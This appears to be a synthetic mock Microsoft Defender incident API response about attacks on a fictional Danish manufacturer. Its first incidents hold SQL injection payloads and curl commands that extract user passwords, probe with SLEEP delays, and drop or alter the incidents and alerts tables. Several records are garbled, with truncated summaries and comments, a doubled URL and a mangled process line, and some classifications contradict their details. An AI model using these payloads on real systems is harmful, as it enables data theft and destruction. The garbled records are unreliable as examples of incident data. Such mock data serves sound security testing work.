{
'@odata.context': 'https://api.security.microsoft.com/api/$metadata#Incidents', 
'@odata.count': 205, 
'@odata.nextLink': '/api/incidents?$skip=10&$top=10', 
'api_version': '4.0', 
'mode': 'mandatory2', 
'note': 'Static dataset: 200 incidents (Mandatory 2 mode)', 
'pagination': {
    'filtered_total': 205, 
    'returned': 10, 
    'skip': 0, 
    'top': 10, 
    'unfiltered_total': 205}, 
'value': [ {
    'alerts': [ {
        'alertId': 'ALT-SQLI-001-0', 
        'category': 'Exploitation', 
        'computerDnsName': 'CAD01-TCORP.oresund-industrial.dk', 
        'detectionSource': 'Microsoft Defender for Endpoint', 
        'entities': { 
            'domains': ['update-oresund.com'], 
            'emails': ['eng.larsen@oresund-industrial.dk'], 
            'fileHashes': ['5d41402abc4b2a76b9719d911017c592'], 
            'ips': ['192.168.30.10', '172.16.100.10'], 
            'processes': ['python3.exe sqlm=admin\' OR \'1\'=\'1\'-- -&password=x" --dump --tables'], 
            'urls': ["http://172.16.100.http://172.16.100.10/portal/login?username=admin'--&password="]}, 
        'firstSeen': '2026-03-29T00:44:22.420566+00:00', 
        'lastSeen': '2026-03-29T02:04:22.420566+00:00', 
        'machineId': 'CAD01-TCORP', 
        'severity': 'High', 
        'title': 'SQL injection tool (sqlmap) execution detected on CAD01-TCORP'}], 
        
    'assignedTo': 'soc.analyst@oresund-industrial.dk', 
    'classification': 'TruePositive', 
    'comments': [ {
        'comment': 'tion CAD01-TCORP.', 
        'createdBy': 'soc.analyst@oresund-industrial.dk', 
        'createdTime': '2026-03-29T02:04:22.420566+00:00'}], 
    'createdTime': '2026-03-29T01:04:22.420566+00:00', 
    'determination': 'MaliciousUserActivity', 
    'impactedEntities': {'machines': 2, 'mailboxes': 0, 'users': 0}, 
    'incidentId': 'INC-SQLI-001', 
    'incidentName': 'APT28 - Web Application Attack on WEB01-TCORP', 
    'lastUpdateTime': '2026-03-29T02:34:22.420566+00:00', 
    'mitreTechniques': ['T1190', 'T1059.001', 'T1505.003'], 
    'severity': 'High', 
    'status': 'Active', 
    'summary': 'APT28 gained foot web server logs.', 
    'tags': ['APT28', 'Cobalt Strike', 'Øresund Industrial', 'WebAttack'], 
    'threatFamily': 'Cobalt Strike'}, 
            
    {
    'alerts': [ {
        'alertId': 'ALT-SQLI-002-0', 
        'category': 'Exploitation', 
        'computerDnsName': 'ERP01-TCORP.oresund-industrial.dk', 
        'detectionSource': 'Microsoft Defender for Endpoint', 
        'entities': {
            'domains': ['ot-firmware-update.xyz', 'command-control-eu.net'], 
            'emails': ['ceo.andersen@oresund-industrial.dk'], 
            'fileHashes': ['098f6bcd4621d373cade4e832627b4f6'], 
            'ips': ['91.108.56.175', '194.165.16.98', '192.168.20.25'], 
            'processes': ['w3wp.exe', 'curl -sT username,password,3,4 FROM users-- -"'], 
            'urls': ['http://192.168.20.25/api/v1/products?id=1 UNIONmail,4 FROM users-- -']}, 
        'firstSeen': '2026-03-29T01:54:22.420566+00:00', 
        'lastSeen': '2026-03-29T04:04:22.420566+00:00', 
        'machineId': 'ERP01-TCORP', 
        'severity': 'Critical', 
        'title': 'Web application SQL injection attack blocked - ERP01-TCORP'}], 
    'assignedTo': 'it.support@oresund-industrial.dk', 
    'classification': 'TruePositive', 
    'comments': [{'comment': 'WAF blocked 47 SQLi attempts against /api/v1/products and /api/v1/orders endpoints. Payload attempts gradually escalated from error-based to UNION-based extraction.', 'createdBy': 'it.support@oresund-industrial.dk', 'createdTime': '2026-03-29T03:19:22.420566+00:00'}], 'createdTime': '2026-03-29T02:04:22.420566+00:00', 'determination': 'MultiStagedAttack', 'impactedEntities': {'machines': 1, 'mailboxes': 0, 'users': 1}, 'incidentId': 'INC-SQLI-002', 'incidentName': 'Lazarus Group - ERP REST API Data Extraction Attempt', 'lastUpdateTime': '2026-03-29T04:04:22.420566+00:00', 'mitreTechniques': ['T1190', 'T1083', 'T1041'], 'severity': 'Critical', 'status': 'InProgress', 'summary': 'Lazarus Group conducted a systematic UNION-based SQL injection campaign against the ERP REST API at Øresund Industrial. The WAF captured and blocked the malicious requests; full SQL payloads are preserved as indicators of compromise.', 'tags': ['Lazarus Group', 'TrickBot', 'Øresund Industrial', 'WebAttack'], 'threatFamily': 'TrickBot'}, {'alerts': [{'alertId': 'ALT-SQLI-003-0', 'category': 'Exploitation', 'computerDnsName': 'WEB01-TCORP.oresund-industrial.dk', 'detectionSource': 'Microsoft Defender for Endpoint', 'entities': {'domains': ['scada-remote-access.biz'], 'emails': ['suspicious@external-vendor.com'], 'fileHashes': ['e99a18c428cb38d5f260853678922e03'], 'ips': ['185.220.100.240', '172.16.100.10'], 'processes': ['python3 -c "import requests,time; [print(time.time(), requests.get(f\\"http://172.16.100.10/portal/search?q=test\' AND SLEEP({n})-- -\\").elapsed) for n in [0,5,0,5]]"'], 'urls': ["http://172.16.100.10/portal/search?q=oresund' AND SLEEP(5)-- -", "http://172.16.100.10/portal/search?q=oresund' AND IF(1=1,SLEEP(5),0)-- -", "http://172.16.100.10/portal/suppliers?id=3' AND (SELECT * FROM (SELECT(SLEEP(5)))a)-- -"]}, 'firstSeen': '2026-03-29T02:59:22.420566+00:00', 'lastSeen': '2026-03-29T04:34:22.420566+00:00', 'machineId': 'WEB01-TCORP', 'severity': 'High', 'title': 'Blind SQL injection pattern detected on WEB01-TCORP partner portal'}], 'assignedTo': None, 'classification': 'TruePositive', 'comments': [{'comment': 'Anomalous response-time pattern detected on /portal/search. 5-second delays consistent with SLEEP(5) blind SQLi probes. Origin: Tor exit node 185.220.100.240.', 'createdBy': 'soc.analyst@oresund-industrial.dk', 'createdTime': '2026-03-29T04:04:22.420566+00:00'}], 'createdTime': '2026-03-29T03:04:22.420566+00:00', 'determination': 'MaliciousUserActivity', 'impactedEntities': {'machines': 1, 'mailboxes': 0, 'users': 0}, 'incidentId': 'INC-SQLI-003', 'incidentName': 'FIN7 - Blind SQL Injection Reconnaissance on Partner Portal', 'lastUpdateTime': '2026-03-29T04:34:22.420566+00:00', 'mitreTechniques': ['T1190', 'T1082', 'T1046'], 'severity': 'High', 'status': 'Active', 'summary': 'FIN7 performed systematic blind time-based SQL injection reconnaissance against the Øresund Industrial partner portal. Captured HTTP requests containing SLEEP() payloads stored as indicators.', 'tags': ['FIN7', 'BlackEnergy', 'Øresund Industrial', 'WebAttack'], 'threatFamily': 'BlackEnergy'}, {'alerts': [{'alertId': 'ALT-SQLI-004-0', 'category': 'Exploitation', 'computerDnsName': 'WEB01-TCORP.oresund-industrial.dk', 'detectionSource': 'Microsoft Defender for Endpoint', 'entities': {'domains': ['oresund-supplier-portal.net'], 'emails': ['suspicious@external-vendor.com'], 'fileHashes': ['7d865e959b2466918c9863afca942d0fb89d7c9ac0c99bafc3749504ded97730'], 'ips': ['45.142.212.100', '172.16.100.10'], 'processes': ['curl -X POST http://172.16.100.10/portal/register -d "company_name=Acme\' UNION SELECT name,sql,3 FROM sqlite_master WHERE type=\'table\'-- -&contact=test@test.com"', 'curl -X POST http://172.16.100.10/portal/register -d "company_name=\'); INSERT INTO incidents (incidentId,incidentName,severity,status,createdTime) VALUES (\'INC-PWN\',\'Pwned\',\'Critical\',\'Active\',\'2026-01-01T00:00:00+00:00\'); --&contact=x"'], 'urls': ["http://172.16.100.10/portal/register [POST] company_name=Acme' UNION SELECT name,sql,3 FROM sqlite_master WHERE type='table'-- -", "http://172.16.100.10/portal/register [POST] company_name=test'); DROP TABLE incidents; --"]}, 'firstSeen': '2026-03-29T03:54:22.420566+00:00', 'lastSeen': '2026-03-29T05:04:22.420566+00:00', 'machineId': 'WEB01-TCORP', 'severity': 'Critical', 'title': 'SQL injection via POST body detected on supplier registration endpoint'}], 'assignedTo': 'soc.analyst@oresund-industrial.dk', 'classification': 'TruePositive', 'comments': [{'comment': 'POST body injection confirmed. Attacker enumerated table names via error messages before switching to blind extraction. company_name field was the injection point.', 'createdBy': 'soc.analyst@oresund-industrial.dk', 'createdTime': '2026-03-29T04:49:22.420566+00:00'}], 'createdTime': '2026-03-29T04:04:22.420566+00:00', 'determination': 'MaliciousUserActivity', 'impactedEntities': {'machines': 1, 'mailboxes': 0, 'users': 2}, 'incidentId': 'INC-SQLI-004', 'incidentName': 'GOLD DUPONT - Supplier Registration Form Exploitation', 'lastUpdateTime': '2026-03-29T05:04:22.420566+00:00', 'mitreTechniques': ['T1190', 'T1078', 'T1505.003'], 'severity': 'Critical', 'status': 'Active', 'summary': 'GOLD DUPONT exploited the Øresund Industrial supplier registration form using POST-body SQL injection. Captured payloads show table enumeration and attempted INSERT injection.', 'tags': ['GOLD DUPONT', 'Qakbot', 'Øresund Industrial', 'WebAttack'], 'threatFamily': 'Qakbot'}, {'alerts': [{'alertId': 'ALT-SQLI-005-0', 'category': 'Exploitation', 'computerDnsName': 'ERP01-TCORP.oresund-industrial.dk', 'detectionSource': 'Microsoft Defender for Endpoint', 'entities': {'domains': ['fortinet-patch.info'], 'emails': ['admin.jensen@oresund-industrial.dk'], 'fileHashes': ['d41d8cd98f00b204e9800998ecf8427e'], 'ips': ['23.106.215.42', '192.168.20.25'], 'processes': ['curl -H "X-Forwarded-For: 1.1.1.1\' UNION SELECT username,password FROM users-- -" http://192.168.20.25/erp/dashboard', 'curl -A "Mozilla/5.0\' OR \'1\'=\'1" -H "X-Forwarded-For: 10.0.0.1\' OR \'1\'=\'1\'-- -" http://192.168.20.25/erp/reports'], 'urls': ["http://192.168.20.25/erp/dashboard [Header: X-Forwarded-For: 1.1.1.1' UNION SELECT username,password FROM users-- -]", "http://192.168.20.25/erp/reports [Header: User-Agent: Mozilla/5.0' OR '1'='1]", "http://192.168.20.25/erp/dashboard [Header: X-Forwarded-For: '); DELETE FROM alerts WHERE ('1'='1]"]}, 'firstSeen': '2026-03-29T04:49:22.420566+00:00', 'lastSeen': '2026-03-29T05:34:22.420566+00:00', 'machineId': 'ERP01-TCORP', 'severity': 'High', 'title': 'HTTP header SQL injection attack detected on ERP web interface'}], 'assignedTo': None, 'classification': 'TruePositive', 'comments': [{'comment': 'Injection via X-Forwarded-For and User-Agent HTTP headers. Application was logging header values directly into the database without sanitisation.', 'createdBy': 'soc.analyst@oresund-industrial.dk', 'createdTime': '2026-03-29T05:19:22.420566+00:00'}], 'createdTime': '2026-03-29T05:04:22.420566+00:00', 'determination': 'MaliciousUserActivity', 'impactedEntities': {'machines': 1, 'mailboxes': 0, 'users': 0}, 'incidentId': 'INC-SQLI-005', 'incidentName': 'Volt Typhoon - HTTP Header Injection on ERP Web Interface', 'lastUpdateTime': '2026-03-29T05:34:22.420566+00:00', 'mitreTechniques': ['T1190', 'T1071.001'], 'severity': 'High', 'status': 'Active', 'summary': 'Volt Typhoon exploited unsanitised HTTP header logging on the ERP web interface. X-Forwarded-For and User-Agent headers containing SQL payloads were written directly to the application database.', 'tags': ['Volt Typhoon', 'PowerShell Empire', 'Øresund Industrial', 'WebAttack'], 'threatFamily': 'PowerShell Empire'}, {'alerts': [{'alertId': 'ALT1013-0', 'category': 'Lateral Movement', 'computerDnsName': 'WEB01-TCORP.oresund-industrial.dk', 'detectionSource': 'Microsoft Defender for Endpoint', 'entities': {'domains': ['update-oresund.com', 'oresund-supplier-portal.net'], 'emails': ['eng.larsen@oresund-industrial.dk', 'sysadmin.nielsen@oresund-industrial.dk'], 'fileHashes': ['d41d8cd98f00b204e9800998ecf8427e', '098f6bcd4621d373cade4e832627b4f6'], 'ips': ['192.168.20.15'], 'processes': ['powershell.exe']}, 'firstSeen': '2026-03-29T11:59:21.442881+00:00', 'lastSeen': '2026-03-30T06:34:21.442881+00:00', 'machineId': 'WEB01-TCORP', 'severity': 'Low', 'title': 'Lateral movement from IT to OT network detected'}, {'alertId': 'ALT1013-1', 'category': 'UnauthorizedAccess', 'computerDnsName': 'MAIL01-TCORP.oresund-industrial.dk', 'detectionSource': 'Microsoft Defender for Office 365', 'entities': {'domains': ['fortinet-patch.info', 'command-control-eu.net'], 'emails': ['noreply@phishing-supplier.net'], 'fileHashes': ['098f6bcd4621d373cade4e832627b4f6', '7d865e959b2466918c9863afca942d0fb89d7c9ac0c99bafc3749504ded97730'], 'ips': ['23.106.215.42', '172.16.100.20', '10.1.20.15'], 'processes': ['powershell.exe', 'cmd.exe']}, 'firstSeen': '2026-03-29T11:59:21.442881+00:00', 'lastSeen': '2026-03-29T18:34:21.442881+00:00', 'machineId': 'MAIL01-TCORP', 'severity': 'Critical', 'title': 'Data exfiltration attempt from ERP system'}, {'alertId': 'ALT1013-2', 'category': 'C2', 'computerDnsName': 'ERP01-TCORP.oresund-industrial.dk', 'detectionSource': 'Microsoft Defender for Endpoint', 'entities': {'domains': ['scada-remote-access.biz'], 'emails': ['suspicious@external-vendor.com'], 'fileHashes': ['7d865e959b2466918c9863afca942d0fb89d7c9ac0c99bafc3749504ded97730'], 'ips': ['192.168.10.12', '172.16.100.20'], 'processes': ['powershell.exe']}, 'firstSeen': '2026-03-29T12:30:21.442881+00:00', 'lastSeen': '2026-03-29T20:34:21.442881+00:00', 'machineId': 'ERP01-TCORP', 'severity': 'Low', 'title': 'Malware detected: Industroyer'}, {'alertId': 'ALT1013-3', 'category': 'C2', 'computerDnsName': 'MAIL01-TCORP.oresund-industrial.dk', 'detectionSource': 'Microsoft Defender for Endpoint', 'entities': {'domains': ['siemens-update-dl.org'], 'emails': ['eng.larsen@oresund-industrial.dk'], 'fileHashes': ['098f6bcd4621d373cade4e832627b4f6', 'b94d27b9934d3e08a52e52d7da7dabfac484efe37a5380ee9088f7ace2efcde9'], 'ips': ['192.168.30.10'], 'processes': ['powershell.exe']}, 'firstSeen': '2026-03-29T11:56:21.442881+00:00', 'lastSeen': '2026-03-30T01:34:21.442881+00:00', 'machineId': 'MAIL01-TCORP', 'severity': 'Medium', 'title': 'Brute force attack against domain controller'}, {'alertId': 'ALT1013-4', 'category': 'UnauthorizedAccess', 'computerDnsName': 'FS01-TCORP.oresund-industrial.dk', 'detectionSource': 'Microsoft Defender for Office 365', 'entities': {'domains': ['ot-firmware-update.xyz'], 'emails': ['cfo.hansen@oresund-industrial.dk'], 'fileHashes': ['7d865e959b2466918c9863afca942d0fb89d7c9ac0c99bafc3749504ded97730', 'd41d8cd98f00b204e9800998ecf8427e'], 'ips': ['192.168.20.10', '10.1.40.21', '192.168.10.12'], 'processes': ['powershell.exe', 'cmd.exe']}, 'firstSeen': '2026-03-29T12:30:21.442881+00:00', 'lastSeen': '2026-03-29T22:34:21.442881+00:00', 'machineId': 'FS01-TCORP', 'severity': 'Low', 'title': 'Unauthorized SCADA configuration change detected'}], 'assignedTo': None, 'classification': 'InformationalExpectedActivity', 'comments': [{'comment': 'Initial analysis shows indicators consistent with XENOTIME TTPs targeting industrial manufacturing environments', 'createdBy': 'soc.analyst@oresund-industrial.dk', 'createdTime': '2026-03-29T12:34:21.442881+00:00'}], 'createdTime': '2026-03-29T11:34:21.442881+00:00', 'determination': 'Malware', 'impactedEntities': {'machines': 2, 'mailboxes': 3, 'users': 1}, 'incidentId': 'INC1013', 'incidentName': 'XENOTIME - Phishing Campaign', 'lastUpdateTime': '2026-03-30T13:34:21.442881+00:00', 'mitreTechniques': ['T1033', 'T1003.001', 'T1204.002'], 'severity': 'High', 'status': 'Resolved', 'summary': 'Security incident at Øresund Industrial Manufacturing A/S involving XENOTIME with 5 alerts. Investigation shows Industroyer malware deployment with potential impact on manufacturing operations.', 'tags': ['XENOTIME', 'Industroyer', 'Øresund Industrial'], 'threatFamily': 'Industroyer'}, {'alerts': [{'alertId': 'ALT1064-0', 'category': 'Phishing', 'computerDnsName': 'CAD01-TCORP.oresund-industrial.dk', 'detectionSource': 'Microsoft Defender for Endpoint', 'entities': {'domains': ['command-control-eu.net'], 'emails': ['noreply@phishing-supplier.net'], 'fileHashes': ['b94d27b9934d3e08a52e52d7da7dabfac484efe37a5380ee9088f7ace2efcde9', 'e99a18c428cb38d5f260853678922e03'], 'ips': ['10.2.30.60', '172.16.100.10', '172.16.100.20'], 'processes': ['powershell.exe']}, 'firstSeen': '2026-03-29T12:33:21.801256+00:00', 'lastSeen': '2026-03-29T20:34:21.801256+00:00', 'machineId': 'CAD01-TCORP', 'severity': 'Critical', 'title': 'Suspicious remote access to HMI workstation'}, {'alertId': 'ALT1064-1', 'category': 'Phishing', 'computerDnsName': 'FS01-TCORP.oresund-industrial.dk', 'detectionSource': 'Microsoft Defender for Endpoint', 'entities': {'domains': ['oresund-industrial.dk.attacker.cc'], 'emails': ['ceo.andersen@oresund-industrial.dk', 'cfo.hansen@oresund-industrial.dk'], 'fileHashes': ['5d41402abc4b2a76b9719d911017c592', 'b94d27b9934d3e08a52e52d7da7dabfac484efe37a5380ee9088f7ace2efcde9'], 'ips': ['10.1.40.21', '192.168.10.12'], 'processes': ['powershell.exe']}, 'firstSeen': '2026-03-29T11:46:21.801256+00:00', 'lastSeen': '2026-03-30T05:34:21.801256+00:00', 'machineId': 'FS01-TCORP', 'severity': 'High', 'title': 'Lateral movement from IT to OT network detected'}], 'assignedTo': None, 'classification': 'FalsePositive', 'comments': [{'comment': 'Initial analysis shows indicators consistent with Volt Typhoon TTPs targeting industrial manufacturing environments', 'createdBy': 'soc.analyst@oresund-industrial.dk', 'createdTime': '2026-03-29T12:34:21.801256+00:00'}], 'createdTime': '2026-03-29T11:34:21.801256+00:00', 'determination': 'MultiStagedAttack', 'impactedEntities': {'machines': 5, 'mailboxes': 0, 'users': 4}, 'incidentId': 'INC1064', 'incidentName': 'Volt Typhoon - ERP Data Exfiltration', 'lastUpdateTime': '2026-03-30T22:34:21.801256+00:00', 'mitreTechniques': ['T1204.002', 'T0886', 'T0817'], 'severity': 'High', 'status': 'InProgress', 'summary': 'Security incident at Øresund Industrial Manufacturing A/S involving Volt Typhoon with 2 alerts. Investigation shows BlackEnergy malware deployment with potential impact on manufacturing operations.', 'tags': ['Volt Typhoon', 'BlackEnergy', 'Øresund Industrial'], 'threatFamily': 'BlackEnergy'}, {'alerts': [{'alertId': 'ALT1094-0', 'category': 'Lateral Movement', 'computerDnsName': 'SCADA01-F1.oresund-industrial.dk', 'detectionSource': 'Microsoft Defender for Identity', 'entities': {'domains': ['scada-remote-access.biz'], 'emails': ['cfo.hansen@oresund-industrial.dk'], 'fileHashes': ['098f6bcd4621d373cade4e832627b4f6'], 'ips': ['185.220.100.240', '192.168.20.25'], 'processes': ['powershell.exe']}, 'firstSeen': '2026-03-29T12:08:21.955544+00:00', 'lastSeen': '2026-03-29T12:34:21.955544+00:00', 'machineId': 'SCADA01-F1', 'severity': 'Critical', 'title': 'PLC firmware modification attempt detected'}, {'alertId': 'ALT1094-1', 'category': 'Phishing', 'computerDnsName': 'CAD01-TCORP.oresund-industrial.dk', 'detectionSource': 'Microsoft Defender for Identity', 'entities': {'domains': ['oresund-supplier-portal.net'], 'emails': ['admin.jensen@oresund-industrial.dk'], 'fileHashes': ['b94d27b9934d3e08a52e52d7da7dabfac484efe37a5380ee9088f7ace2efcde9'], 'ips': ['10.1.20.15', '10.1.40.21', '23.106.215.42'], 'processes': ['powershell.exe']}, 'firstSeen': '2026-03-29T11:50:21.955544+00:00', 'lastSeen': '2026-03-30T11:34:21.955544+00:00', 'machineId': 'CAD01-TCORP', 'severity': 'Critical', 'title': 'Brute force attack against domain controller'}], 'assignedTo': 'it.support@oresund-industrial.dk', 'classification': 'FalsePositive', 'comments': [{'comment': 'Initial analysis shows indicators consistent with Lazarus Group TTPs targeting industrial manufacturing environments', 'createdBy': 'soc.analyst@oresund-industrial.dk', 'createdTime': '2026-03-29T12:34:21.955544+00:00'}], 'createdTime': '2026-03-29T11:34:21.955544+00:00', 'determination': 'UnwantedSoftware', 'impactedEntities': {'machines': 5, 'mailboxes': 0, 'users': 2}, 'incidentId': 'INC1094', 'incidentName': 'Lazarus Group - ERP Data Exfiltration', 'lastUpdateTime': '2026-03-29T23:34:21.955544+00:00', 'mitreTechniques': ['T1016', 'T1003.001', 'T1204.002'], 'severity': 'Low', 'status': 'InProgress', 'summary': 'Security incident at Øresund Industrial Manufacturing A/S involving Lazarus Group with 2 alerts. Investigation shows Qakbot malware deployment with potential impact on manufacturing operations.', 'tags': ['Lazarus Group', 'Qakbot', 'Øresund Industrial'], 'threatFamily': 'Qakbot'}, {'alerts': [{'alertId': 'ALT1098-0', 'category': 'Lateral Movement', 'computerDnsName': 'BACKUP01-TCORP.oresund-industrial.dk', 'detectionSource': 'Microsoft Defender for Office 365', 'entities': {'domains': ['oresund-supplier-portal.net'], 'emails': ['suspicious@external-vendor.com'], 'fileHashes': ['098f6bcd4621d373cade4e832627b4f6', 'd41d8cd98f00b204e9800998ecf8427e'], 'ips': ['10.1.40.20', '192.168.10.12'], 'processes': ['powershell.exe']}, 'firstSeen': '2026-03-29T11:53:21.976378+00:00', 'lastSeen': '2026-03-30T11:34:21.976378+00:00', 'machineId': 'BACKUP01-TCORP', 'severity': 'Low', 'title': 'Suspicious PowerShell execution detected on BACKUP01-TCORP'}, {'alertId': 'ALT1098-1', 'category': 'Malware', 'computerDnsName': 'BACKUP01-TCORP.oresund-industrial.dk', 'detectionSource': 'Microsoft Defender for Endpoint', 'entities': {'domains': ['siemens-update-dl.org', 'scada-remote-access.biz'], 'emails': ['admin.jensen@oresund-industrial.dk'], 'fileHashes': ['7d865e959b2466918c9863afca942d0fb89d7c9ac0c99bafc3749504ded97730'], 'ips': ['10.1.40.21', '192.168.30.10', '10.1.20.10'], 'processes': ['powershell.exe', 'cmd.exe']}, 'firstSeen': '2026-03-29T11:42:21.976378+00:00', 'lastSeen': '2026-03-30T04:34:21.976378+00:00', 'machineId': 'BACKUP01-TCORP', 'severity': 'High', 'title': 'Command and control communication from factory network'}, {'alertId': 'ALT1098-2', 'category': 'UnauthorizedAccess', 'computerDnsName': 'FS01-TCORP.oresund-industrial.dk', 'detectionSource': 'Microsoft Defender for Identity', 'entities': {'domains': ['update-oresund.com', 'oresund-supplier-portal.net'], 'emails': ['sysadmin.nielsen@oresund-industrial.dk', 'f1.supervisor@oresund-industrial.dk'], 'fileHashes': ['7d865e959b2466918c9863afca942d0fb89d7c9ac0c99bafc3749504ded97730', 'b94d27b9934d3e08a52e52d7da7dabfac484efe37a5380ee9088f7ace2efcde9'], 'ips': ['185.220.100.240', '91.108.56.175'], 'processes': ['powershell.exe']}, 'firstSeen': '2026-03-29T11:40:21.976378+00:00', 'lastSeen': '2026-03-29T17:34:21.976378+00:00', 'machineId': 'FS01-TCORP', 'severity': 'High', 'title': 'Malware detected: TRITON'}, {'alertId': 'ALT1098-3', 'category': 'Phishing', 'computerDnsName': 'HIST01-F1.oresund-industrial.dk', 'detectionSource': 'Microsoft Defender for Office 365', 'entities': {'domains': ['oresund-supplier-portal.net', 'ot-firmware-update.xyz'], 'emails': ['suspicious@external-vendor.com', 'admin.jensen@oresund-industrial.dk'], 'fileHashes': ['e99a18c428cb38d5f260853678922e03'], 'ips': ['172.16.100.20', '10.1.40.21'], 'processes': ['powershell.exe', 'cmd.exe']}, 'firstSeen': '2026-03-29T11:44:21.976378+00:00', 'lastSeen': '2026-03-29T17:34:21.976378+00:00', 'machineId': 'HIST01-F1', 'severity': 'Medium', 'title': 'Lateral movement from IT to OT network detected'}], 'assignedTo': 'it.support@oresund-industrial.dk', 'classification': 'InformationalExpectedActivity', 'comments': [{'comment': 'Initial analysis shows indicators consistent with ALLANITE TTPs targeting industrial manufacturing environments', 'createdBy': 'soc.analyst@oresund-industrial.dk', 'createdTime': '2026-03-29T12:34:21.976378+00:00'}], 'createdTime': '2026-03-29T11:34:21.976378+00:00', 'determination': 'MultiStagedAttack', 'impactedEntities': {'machines': 2, 'mailboxes': 2, 'users': 9}, 'incidentId': 'INC1098', 'incidentName': 'ALLANITE - Credential Theft', 'lastUpdateTime': '2026-03-30T15:34:21.976378+00:00', 'mitreTechniques': ['T0886', 'T1049'], 'severity': 'Critical', 'status': 'Resolved', 'summary': 'Security incident at Øresund Industrial Manufacturing A/S involving ALLANITE with 4 alerts. Investigation shows TRITON malware deployment with potential impact on manufacturing operations.', 'tags': ['ALLANITE', 'TRITON', 'Øresund Industrial'], 'threatFamily': 'TRITON'}, {'alerts': [{'alertId': 'ALT1108-0', 'category': 'Exfiltration', 'computerDnsName': 'BACKUP01-TCORP.oresund-industrial.dk', 'detectionSource': 'Microsoft Defender for Office 365', 'entities': {'domains': ['oresund-industrial.dk.attacker.cc', 'oresund-supplier-portal.net'], 'emails': ['noreply@phishing-supplier.net', 'f1.supervisor@oresund-industrial.dk'], 'fileHashes': ['b94d27b9934d3e08a52e52d7da7dabfac484efe37a5380ee9088f7ace2efcde9'], 'ips': ['192.168.10.12', '10.2.30.60', '192.168.20.10'], 'processes': ['powershell.exe', 'cmd.exe']}, 'firstSeen': '2026-03-29T12:27:22.033994+00:00', 'lastSeen': '2026-03-30T09:34:22.033994+00:00', 'machineId': 'BACKUP01-TCORP', 'severity': 'Low', 'title': 'Suspicious remote access to HMI workstation'}, {'alertId': 'ALT1108-1', 'category': 'Exfiltration', 'computerDnsName': 'BACKUP01-TCORP.oresund-industrial.dk', 'detectionSource': 'Microsoft Defender for Office 365', 'entities': {'domains': ['fortinet-patch.info'], 'emails': ['cfo.hansen@oresund-industrial.dk', 'ceo.andersen@oresund-industrial.dk'], 'fileHashes': ['b94d27b9934d3e08a52e52d7da7dabfac484efe37a5380ee9088f7ace2efcde9', '7d865e959b2466918c9863afca942d0fb89d7c9ac0c99bafc3749504ded97730'], 'ips': ['10.2.40.20', '45.142.212.100'], 'processes': ['powershell.exe']}, 'firstSeen': '2026-03-29T12:12:22.033994+00:00', 'lastSeen': '2026-03-30T09:34:22.033994+00:00', 'machineId': 'BACKUP01-TCORP', 'severity': 'Low', 'title': 'Suspicious remote access to HMI workstation'}, {'alertId': 'ALT1108-2', 'category': 'Malware', 'computerDnsName': 'WEB01-TCORP.oresund-industrial.dk', 'detectionSource': 'Microsoft Defender for Endpoint', 'entities': {'domains': ['oresund-supplier-portal.net', 'ot-firmware-update.xyz'], 'emails': ['admin.jensen@oresund-industrial.dk', 'f1.supervisor@oresund-industrial.dk'], 'fileHashes': ['e99a18c428cb38d5f260853678922e03'], 'ips': ['192.168.20.25', '192.168.20.15', '45.142.212.100'], 'processes': ['powershell.exe']}, 'firstSeen': '2026-03-29T12:32:22.033994+00:00', 'lastSeen': '2026-03-29T13:34:22.033994+00:00', 'machineId': 'WEB01-TCORP', 'severity': 'Critical', 'title': 'Suspicious remote access to HMI workstation'}, {'alertId': 'ALT1108-3', 'category': 'UnauthorizedAccess', 'computerDnsName': 'FS01-TCORP.oresund-industrial.dk', 'detectionSource': 'Microsoft Defender for Identity', 'entities': {'domains': ['command-control-eu.net'], 'emails': ['suspicious@external-vendor.com'], 'fileHashes': ['098f6bcd4621d373cade4e832627b4f6', 'e99a18c428cb38d5f260853678922e03'], 'ips': ['172.16.100.10'], 'processes': ['powershell.exe', 'cmd.exe']}, 'firstSeen': '2026-03-29T11:38:22.033994+00:00', 'lastSeen': '2026-03-30T02:34:22.033994+00:00', 'machineId': 'FS01-TCORP', 'severity': 'Critical', 'title': 'Brute force attack against domain controller'}, {'alertId': 'ALT1108-4', 'category': 'Exfiltration', 'computerDnsName': 'MAIL01-TCORP.oresund-industrial.dk', 'detectionSource': 'Microsoft Defender for Identity', 'entities': {'domains': ['update-oresund.com', 'siemens-update-dl.org'], 'emails': ['eng.larsen@oresund-industrial.dk'], 'fileHashes': ['7d865e959b2466918c9863afca942d0fb89d7c9ac0c99bafc3749504ded97730'], 'ips': ['10.2.30.60', '194.165.16.98'], 'processes': ['powershell.exe']}, 'firstSeen': '2026-03-29T11:58:22.033994+00:00', 'lastSeen': '2026-03-29T19:34:22.033994+00:00', 'machineId': 'MAIL01-TCORP', 'severity': 'Medium', 'title': 'Phishing email targeting Øresund Industrial employees'}], 'assignedTo': 'soc.analyst@oresund-industrial.dk', 'classification': 'TruePositive', 'comments': [{'comment': 'Initial analysis shows indicators consistent with FIN7 TTPs targeting industrial manufacturing environments', 'createdBy': 'soc.analyst@oresund-industrial.dk', 'createdTime': '2026-03-29T12:34:22.033994+00:00'}], 'createdTime': '2026-03-29T11:34:22.033994+00:00', 'determination': 'UnwantedSoftware', 'impactedEntities': {'machines': 3, 'mailboxes': 2, 'users': 8}, 'incidentId': 'INC1108', 'incidentName': 'FIN7 - Phishing Campaign', 'lastUpdateTime': '2026-03-30T16:34:22.033994+00:00', 'mitreTechniques': ['T1204.002', 'T1055'], 'severity': 'Critical', 'status': 'Resolved', 'summary': 'Security incident at Øresund Industrial Manufacturing A/S involving FIN7 with 5 alerts. Investigation shows Industroyer malware deployment with potential impact on manufacturing operations.', 'tags': ['FIN7', 'Industroyer', 'Øresund Industrial'], 'threatFamily': 'Industroyer'}]}
